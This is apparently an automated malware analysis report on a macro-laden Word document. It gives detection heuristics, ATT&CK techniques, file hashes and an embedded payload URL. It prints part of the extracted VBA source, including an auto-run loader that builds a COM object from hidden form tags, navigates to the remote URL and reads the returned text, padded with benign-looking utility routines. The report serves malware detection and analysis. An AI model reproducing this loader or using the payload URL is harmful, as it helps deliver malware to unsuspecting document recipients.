MALICIOUS
372
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a critical obfuscated auto-exec VBA loader with a Document_Open macro, indicating malicious intent. The VBA script attempts to download and execute a payload from the URL http://ikh63fd.imparisystems.com/UTRO.php. This is further supported by the embedded OLE object also containing a macro and pointing to the same URL.
Heuristics 10
-
ClamAV: Doc.Malware.Ehrf-10008131-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Ehrf-10008131-0
-
Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECTThis document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded OLE object medium OOXML_OLE_OBJECTDocument contains an embedded OLE object
-
Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URLAn embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ikh63fd.imparisystems.com/UTRO.php In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9985 bytes |
SHA-256: 753b04b799c1c13dc86848861086149289af1fc3bf8e24cfbcb0d0093214a624 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub vSDtPv()
If Year(Date) = 2019 Then
hZWemp.grhgrgrg
End If
ThisDocument.Close
End Sub
Attribute VB_Name = "hZWemp"
Attribute VB_Base = "0{4888A8D6-9478-4555-AA01-426265E8A53C}{53624690-F57E-4A2D-9737-B47097B0914C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public kfAeXgL As String
Public hEorHPq As Object
Dim vlnmlgmrglpPP(309, 2) As String
Public Sub grhgrgrg()
On Error Resume Next
hZWemp.Hide
Set hEorHPq = CreateObject(fhvgut.Tag)
hEorHPq.navigate (hZWemp.yDsymL.Tag)
Do Until hEorHPq.readyState = 4
DoEvents
Loop
kfAeXgL = hEorHPq.Document.body.innerText
nxUVWWo
End Sub
'Replace accended chars with their plaintext alphabet counterparts
'Remove all shapes in the Active Document
Function DeleteShapes()
Dim i As Long
With ActiveDocument
For i = .Shapes.Count To 1 Step -1
With .Shapes(i)
If .Type = msoAutoShape Then .Delete
End With
Next i
End With
End Function
'Save a new file from range Section within the parent file with fileName from Range Header within Section
Private Static Sub CopyAndSave(Section As Range, Header As Range, maxFileName As Integer)
Dim name As String
Header.Select
Selection.ClearFormatting
Dim D As Document
'File name cannot contain \ / : * ? " < > |
name = Replace(Header.Text, Chr(13), "")
name = Application.CleanString(name)
name = Replace(name, "\", "-")
name = Replace(name, "/", "-")
name = Replace(name, ":", "-")
name = Replace(name, "?", "-")
name = Replace(name, "*", "")
name = Replace(name, """", "")
name = Replace(name, "<", " ")
name = Replace(name, ">", " ")
name = Replace(name, "|", " ")
name = Replace(name, " ", "")
name = Replace(name, Chr(10), "")
name = Replace(name, Chr(13), "")
name = Replace(name, Chr(9), "")
name = Replace(name, "‘", "'")
name = Replace(name, "’", "'")
name = Replace(name, "“", "'")
name = Replace(name, "”", "'")
name = Replace(name, " ", "")
name = Replace(name, "®", "(R)")
name = Replace(name, "™", "(TM)")
name = Replace(name, "™", "(TM)")
name = Replace(name, "£", "(E)")
name = Replace(name, " ", " ")
name = Replace(name, "–", "-")
name = Replace(name, "—", "-")
name = Trim(name)
'Debug.Print name
'Reformatting Header
Header.Select
Selection.Font.Bold = True
Selection.Font.Grow
'Truncate File names to under maxFileName chars
If (Len(name) > maxFileName) Then
name = Left(name, maxFileName) & " ..."
End If
'Debug.Print "Saving: " & name
Header.Copy
Section.Copy
'Saving Document
Set D = Documents.Add
D.Range.PasteAndFormat wdFormatOriginalFormatting
With D.Content.Find
.ClearFormatting
.MatchWildcards = True
.MatchCase = False
.Text = "^13([1-9]).([1-9])*^13"
.Replacement.ClearFormatting
.Replacement.Text = ""
.Execute Replace:=wdReplaceAll, Forward:=True, _
Wrap:=wdFindContinue
End With
D.SaveAs2 FileName:=Section.Parent.Path & Application.PathSeparator & name & ".htm", _
FileFormat:=wdFormatFilteredHTML
D.Close
End Sub
'Remove all existing hyperlinks in a document.
Private Static Sub RemoveAllHyperlinks()
Dim oField As Field
For Each oField In ActiveDocument.Fields
If oField.Type = wdFieldHyperlink Then
oField.Unlink
End If
Next
Set oField = Nothing
End Sub
P
... (truncated)
|
|||
ooxml_oleobject_00.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/_________Microsoft_Word_97-20031.doc | 223232 bytes |
SHA-256: 323fe57f6aa5b000b3eaa76049b1296c7794ae727d7b3ec54b6367a5e724bc34 |
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 14336 bytes |
SHA-256: b1a7b3c0481646deaf6941c713b8191df65ddb36080d2e144e5fe9a83a78c1d2 |
|||
|
Detection
ClamAV:
Doc.Malware.Ehrf-10008131-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.